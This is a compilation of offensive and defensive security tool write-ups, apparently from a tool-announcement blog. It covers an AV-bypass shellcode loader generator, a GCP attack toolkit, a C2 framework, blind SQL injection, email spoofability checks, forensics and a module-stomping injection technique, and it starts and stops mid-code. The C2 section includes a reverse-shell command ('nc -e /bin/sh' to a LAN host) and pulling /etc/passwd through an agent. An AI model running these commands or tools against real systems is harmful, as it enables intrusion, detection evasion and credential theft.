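            return True
    return False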

References

Thanks to open source projects for inspiration

  • Dirsearch by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

By: Zion3R


Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

  • Capable of bypassing some well-known antivirus (AVs).
  • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
  • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
  • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

  • Golang installed.
  • Basic understanding of shellcode operations.
  • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

To clone and run this application, you'll need Git installed on your computer. From your command line:

# Clone this repository
$ git clone https://github.com/zerx0r/dvenom
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/

After installation, you can run the tool using the following command:

./dvenom -h

  • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
  • -key: Provide the encryption key.
  • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
  • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
  • -procname: Provide the process name to be injected (default is "explorer").
  • -scfile: Provide the path to the shellcode file.

To generate C# source code that contains encrypted shellcode:

Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs

Language   | Supported Methods                 | Supported Encryption
C#         | valloc, pinject, hollow, ntinject | xor, rot, aes256, rc4
Rust       | pinject, hollow, ntinject         | xor, rot, rc4
PowerShell | valloc, pinject                   | xor, rot
ASPX       | valloc                            | xor, rot
VBA        | valloc                            | xor, rot

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

This project is licensed under the MIT License - see the LICENSE file for details.

Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.



WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.
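A simplified sketch of that request-variation loop might look like the following. The payload and header lists are illustrative only, and this is not WebSecProbe's actual code.

# Illustrative request-variation loop (not WebSecProbe's payload list or code).
import requests

PAYLOADS = ["", "/", "/.", "//", "/%2e/", "/..;/"]
HEADERS = [{}, {"X-Forwarded-For": "127.0.0.1"}, {"X-Original-URL": "/admin-login"}]

def probe(base_url, path):
    for payload in PAYLOADS:
        for headers in HEADERS:
            url = f"{base_url.rstrip('/')}/{path}{payload}"
            resp = requests.get(url, headers=headers, timeout=10, allow_redirects=False)
            print(f"{url} {headers} -> {resp.status_code}, {len(resp.content)} bytes")

probe("https://example.com", "admin-login")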

 

pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
    url = 'https://example.com'  # Replace with your target URL
    path = 'admin-login'  # Replace with your desired path

    probe = WebSecProbe(url, path)
    probe.run()



TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.
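For a sense of what protocol filtering over a PCAP looks like, here is a minimal scapy sketch; TrafficWatch's own analysis, colored output, and protocol coverage are richer than this.

# Minimal scapy sketch: filter packets in a PCAP by protocol and print summaries.
from scapy.all import rdpcap
from scapy.layers.inet import TCP, UDP, ICMP
from scapy.layers.dns import DNS

FILTERS = {"TCP": TCP, "UDP": UDP, "ICMP": ICMP, "DNS": DNS}

def show(pcap_path, protocol=None, count=10):
    layer = FILTERS.get(protocol)
    shown = 0
    for pkt in rdpcap(pcap_path):
        if layer and not pkt.haslayer(layer):
            continue
        print(f"{float(pkt.time):.6f}  {pkt.summary()}")
        shown += 1
        if shown >= count:
            break

show("path/to/your.pcap", protocol="DNS", count=10)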

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about TrafficWatch, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category   | Primary Module | Command Group | Operation   | Description
User Authentication | auth           | -             | activate    | Activate a Specific Authentication Method
User Authentication | auth           | -             | add         | Add a New Authentication Method
User Authentication | auth           | -             | delete      | Remove a Specific Authentication Method
User Authentication | auth           | -             | list        | List All Available Authentication Methods
Cloud Functions     | functions      | -             | list        | List All Deployed Cloud Functions
Cloud Functions     | functions      | -             | permissions | Display Permissions for a Specific Cloud Function
Cloud Functions     | functions      | -             | triggers    | List All Triggers for a Specific Cloud Function
Cloud Storage       | storage        | buckets       | list        | List All Storage Buckets
Cloud Storage       | storage        | buckets       | permissions | Display Permissions for Storage Buckets
Compute Engine      | compute        | instances     | add-ssh-key | Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and its modules!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required, along with the following dependencies.

Linux is required for admin.py and c2_server.py (untested on Windows).
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And finally the agent. The Python agent can simply be run, but the C agent needs to be compiled first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the agents and the server run over TLS and base64. The communication endpoint is set to 127.0.0.1:5000; if a different endpoint is needed, it should be changed in the agents' source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary, but it is not; at least that is what I believe :P

The idea behind this functionality is that the c2 server can ask an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.
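
As a rough sketch of that idea (this is not the actual c2_server.py code; the function and helper names below are invented for illustration):

# hypothetical sketch of the server-side re-registration check
def handle_task_request(agent_uuid):
    agent = db_lookup_agent(agent_uuid)       # invented helper: query the sqlite db
    if agent is None:
        # unknown uuid (e.g. right after the tables were dropped):
        # instead of serving tasks, ask the agent to register again
        return {"task": "c2-register"}
    return {"task": db_next_task(agent_uuid)}  # invented helper: fetch a pending task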

Flows

Below you can find a normal flow diagram

Normal Flow

In case the environment experiences a major failure, like a corrupted database or some other critical failure, the re-registration mechanism kicks in so we don't lose our connection with our agents.

More specifically, if we lose the database we will not have any information about the uuids that we are receiving, so we can't set tasks on them. The agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again, so we can insert them into our database and control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To set up your environment, start admin.py first, then c2_server.py, and then run the agent. Afterwards you can check the available agents.

# show all available agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:
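
# instruct all the agents to run the command "id"
task add all c2-shell id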

To check the history/previous results of executed tasks for a specific agent, do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval at which the agents check for tasks, e.g. to 30 seconds, like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your preferred agent
task add your_preferred_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, let's select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session, like with netcat or Metasploit, do the following.

# show all available agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that, even if you get disconnected, will come back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.

Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py
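
The general idea can be sketched in a few lines of Python (this is only an illustration of AES-ECB plus base64 over a payload, assuming the pycryptodome package; it is not the actual obfuscator.py code):

from base64 import b64encode
from Crypto.Cipher import AES            # pip3 install pycryptodome
from Crypto.Util.Padding import pad

key = b"0123456789abcdef"                # the 16-character key set in obfuscator.py
payload = open("agent.py", "rb").read()

cipher = AES.new(key, AES.MODE_ECB)
blob = b64encode(cipher.encrypt(pad(payload, AES.block_size)))
# the blob would then be embedded in a small stub that base64-decodes,
# decrypts and exec()s it at runtime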

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips & Tricks

  1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance, like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
  2. Create a binary file for your Python agent like this:
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your Python and pip libs. If it continues failing then... well... life happened

  3. Create new certs for each engagement

  4. Back up your c2.db; it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

By: Zion3R


JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


Prerequisites

Before installing JSpector, you need to have Jython installed on Burp Suite.

Installation

  1. Download the latest version of JSpector
  2. Open Burp Suite and navigate to the Extensions tab.
  3. Click the Add button in the Installed tab.
  4. In the Extension Details dialog box, select Python as the Extension Type.
  5. Click the Select file button and navigate to the JSpector.py.
  6. Click the Next button.
  7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

Usage

  • Just navigate through your targets and JSpector will start passively crawling JS files in the background and automatically return the results to the Dashboard tab.
  • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers & bug bounty hunters to test the security of web applications.


Disclaimer:

This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

Installation

Install HBSQLI with following steps:

$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt

Usage/Examples

usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

Modes

There are basically two modes: verbose, which will show you the whole process as it happens and the status of each test performed, and non-verbose, which will just print the vulnerable ones on the screen. To initiate verbose mode, just add -v to your command.

Notes

  • You can use the provided payload file or a custom payload file; just remember that the delay for each payload in the payload file should be set to 30 seconds.

  • You can use the provided headers file or add more custom headers to that file according to your needs.

Demo



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW IT'S SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

By: Zion3R

Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


What is Dissect?

Dissect is an incident response framework built from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

Singular approach

And the best thing: all in a singular way, regardless of the underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mounting them (in the case of VMDKs and such), retrieving the MFT, and parsing it using a separate tool to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

Create a lightweight container using Acquire

Dissect also provides you with a tool called acquire. You can deploy this tool on endpoints to create a lightweight container of those machines. Conveniently, you can also deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on it, all without having to worry about file locks. These lightweight containers can then be analysed using tools like target-query and target-shell, but feel free to use other tools as well.

A modular setup

Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

Try it out now!

Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

Don’t know where to start? Check out the introduction page.

Want to get a detailed overview? Check out the overview page.

Want to read everything? Check out the documentation.

Projects

Dissect currently consists of the following projects.

Related

These projects are closely related to Dissect, but not installed by this meta package.

Requirements

This project is part of the Dissect framework and requires Python.

Information on the supported Python versions can be found in the Getting Started section of the documentation.

Installation

dissect is available on PyPI.

pip install dissect

Build and test instructions

This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

tox -e build

The build artifacts can be found in the dist/ directory.

tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

tox

For a more elaborate explanation on how to build and test the project, please see the documentation.



ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

By: Zion3R


ModuleShifting is a stealthier variation of the Module Stomping and Module Overloading injection techniques. It is implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


ModuleShifting, when used with a shellcode payload, performs the following operations (a rough ctypes sketch of these steps follows the list):

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. Overwrite shellcode over the target section
  4. add optional padding to better blend into false positive behaviour (more information here)
  5. Change permissions to RX
  6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
  7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.
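
The following is a rough, Windows-only ctypes sketch of steps 1-6 above. It is not ModuleShifting's actual implementation: the target section offset and size are assumed to be known in advance, and the optional padding (step 4) and the cleanup (step 7) are omitted.

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.LoadLibraryW.restype = ctypes.c_void_p

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20

def shift_shellcode(host_dll, section_offset, shellcode):
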